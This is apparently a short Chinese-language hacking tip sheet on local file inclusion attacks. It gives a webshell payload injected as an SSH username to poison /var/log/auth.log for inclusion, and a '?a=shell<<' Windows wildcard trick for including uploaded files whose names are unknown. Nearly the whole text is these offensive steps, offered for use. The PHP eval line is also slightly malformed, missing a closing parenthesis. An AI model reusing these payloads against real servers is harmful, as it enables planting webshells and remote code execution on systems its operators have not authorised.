奇淫邪技之文件包含

0x01 包含登录日志

一般我们都直接放在UA中，然后开始找中间件的日志，有时候可能会有找不到的情况。此时，如果对方服务器开启SSH服务的话，我们可以使用包含SSH日志的方式
如下操作：
SSH连接：
ssh '<?php eval($_POST['a'];?>'@192.168.72.152

对方服务器的日志目录：
/var/log/auth.log
即可查看到我们写入的webshell：

原文来自推特

Windows特性 未知文件名的文件包含

当你知道上传的文件目录后，可利用windows特性来完成文件包含。
其核心在于利用<<进行模糊匹配：
例如存在文件包含页面：test.php
你通过文件上传上传了个文件，其组成在这里被定义为：自定义名称_随机数（这里以日期举例）

此时构造payload为：
?a=shell<<
即可包含成功

思路来自：《代码审计-企业级 Web 代码安全架构》
原文：火线